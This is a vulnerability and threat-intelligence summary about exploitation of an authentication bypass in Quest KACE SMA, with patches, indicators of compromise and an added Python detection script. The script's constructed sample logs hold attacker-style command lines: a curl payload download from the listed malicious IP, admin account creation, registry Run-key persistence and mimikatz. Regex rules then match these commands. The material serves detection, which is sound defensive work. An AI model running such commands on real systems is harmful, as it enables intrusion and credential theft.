Full Report
Threat actors are suspected to be exploiting a maximum-severity security flaw impacting Quest KACE Systems Management Appliance (SMA), according to Arctic Wolf. The cybersecurity company said it observed malicious activity starting the week of March 9, 2026, in customer environments that's consistent with the exploitation of CVE-2025-32975 on unpatched SMA systems exposed to the internet. It's
Analysis Summary
# Vulnerability: Quest KACE SMA Authentication Bypass
## CVE Details
- **CVE ID:** CVE-2025-32975
- **CVSS Score:** 10.0 (Critical)
- **CWE:** Authentication Bypass (Impersonation)
## Affected Systems
- **Products:** Quest KACE Systems Management Appliance (SMA)
- **Versions:** All versions prior to the patches released in May 2025 (specifically, older releases of the 13.x and 14.x branches)
- **Configurations:** Systems exposed directly to the internet are at the highest risk.
## Vulnerability Description
CVE-2025-32975 is a maximum-severity authentication bypass vulnerability. It allows an unauthenticated remote attacker to impersonate legitimate users without providing valid credentials. Successful exploitation grants the attacker the ability to hijack administrative accounts, leading to full control over the appliance.
## Exploitation
- **Status:** Exploited in the wild (Observed by Arctic Wolf starting March 9, 2026).
- **Complexity:** Low
- **Attack Vector:** Network (Remote)
## Impact
- **Confidentiality:** Total (Complete access to system data and credentials)
- **Integrity:** Total (Ability to modify configurations, add admin accounts, and run scripts)
- **Availability:** Total (Potential for full system takeover or shutdown)
## Remediation
### Patches
Quest released fixes for this issue in May 2025. Administrators should ensure they are on the following versions or newer:
- 13.0.385
- 13.1.81
- 13.2.183
- 14.0.341 (Patch 5)
- 14.1.101 (Patch 4)
### Workarounds
- **Network Isolation:** Immediately remove KACE SMA instances from the public internet and restrict access via VPN or Zero Trust Network Access (ZTNA).
## Detection
### Indicators of Compromise (IoCs)
- **Malicious IP:** 216.126.225[.]156
- **Tooling:** Use of `curl` to download Base64-encoded payloads.
- **Process Activity:** Unusual execution of `runkbot.exe` to create new administrative accounts.
- **Persistence:** Windows Registry modifications initiated via PowerShell.
- **Lateral Movement:** Unauthorized RDP connections to backup servers (e.g., Veeam, Veritas) or Domain Controllers.
### Detection Methods
- Audit SMA logs for the creation of unexpected administrative accounts.
- Monitor for "net time" and "net group" commands, which indicate discovery activity.
- Check for the presence of Mimikatz or similar credential harvesting tools in system memory or logs.
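As an added example (not part of the original report or any vendor tooling), the detection methods and IoCs above can be turned into a small rule set and run over endpoint and network telemetry; the event format, host names and command lines below are constructed samples, and the backup-server and DC naming convention is an assumption.

```python
import re
# Constructed sample process-creation events (not real telemetry): host|parent_image|image|command_line
SAMPLE_PROCESS_EVENTS = """\
kace-mgmt-01|runkbot.exe|net.exe|net user svc_kace Temp123 /add
kace-mgmt-01|runkbot.exe|net.exe|net localgroup administrators svc_kace /add
kace-mgmt-01|cmd.exe|net.exe|net time \\\\dc01
kace-mgmt-01|cmd.exe|net.exe|net group "domain admins" /domain
kace-mgmt-01|cmd.exe|curl.exe|curl -s http://216.126.225.156/p.b64 -o p.b64
kace-mgmt-01|powershell.exe|powershell.exe|New-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -Name upd -Value C:\\Temp\\upd.exe
kace-mgmt-01|cmd.exe|mimikatz.exe|mimikatz.exe
kace-mgmt-01|explorer.exe|notepad.exe|notepad.exe C:\\Users\\admin\\notes.txt
"""
# Constructed sample network-flow records: src_host|dst_host|dst_port
SAMPLE_NETWORK_FLOWS = """\
kace-mgmt-01|veeam-bkp-01|3389
kace-mgmt-01|dc01|3389
kace-mgmt-01|fileshare-02|445
ws-finance-07|veeam-bkp-01|443
"""

# (rule name, regex) applied case-insensitively to "parent|image|command_line".
PROCESS_RULES = [
    ("runkbot_account_creation", r"^runkbot\.exe\|net\.exe\|net\s+(user|localgroup)\b.*\s/add\b"),
    ("net_discovery", r"\|net\.exe\|net\s+(time|group)\b"),
    ("curl_from_known_ioc", r"\|curl\.exe\|.*\b216\.126\.225\.156\b"),
    ("powershell_run_key_persistence", r"^powershell\.exe\|.*(New-ItemProperty|Set-ItemProperty|reg\s+add)\b.*\\Run\b"),
    ("mimikatz_image", r"\|[^|]*mimikatz[^|]*\|"),
]
# Backup servers and domain controllers named in the report as lateral-movement targets (naming is assumed).
SENSITIVE_HOST = re.compile(r"veeam|veritas|^dc\d*$", re.IGNORECASE)

def scan_process_events(raw: str) -> list[tuple[str, str, str]]:
    """Return (rule_name, host, command_line) for every event that matches a rule."""
    hits = []
    for line in raw.strip().splitlines():
        host, parent, image, cmdline = line.split("|", 3)
        for name, pattern in PROCESS_RULES:
            if re.search(pattern, f"{parent}|{image}|{cmdline}", re.IGNORECASE):
                hits.append((name, host, cmdline))
    return hits

def scan_network_flows(raw: str) -> list[tuple[str, str]]:
    """Return (src, dst) for RDP (TCP 3389) flows toward backup servers or domain controllers."""
    hits = []
    for line in raw.strip().splitlines():
        src, dst, port = line.split("|")
        if port == "3389" and SENSITIVE_HOST.search(dst):
            hits.append((src, dst))
    return hits
```

The rules key on parent-child relationships (runkbot.exe spawning net.exe) rather than on command names alone, so routine administrative use of `net` from a console does not trigger the account-creation rule.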
## References
- **Quest Advisory:** <https://support.quest.com/kb/4379499/quest-response-to-kace-sma-vulnerabilities-cve-2025-32975-cve-2025-32976-cve-2025-32977-cve-2025-32978>
- **NVD Entry:** <https://nvd.nist.gov/vuln/detail/CVE-2025-32975>
- **Security Report:** <https://thehackernews.com/2026/03/hackers-exploit-cve-2025-32975-cvss-100.html>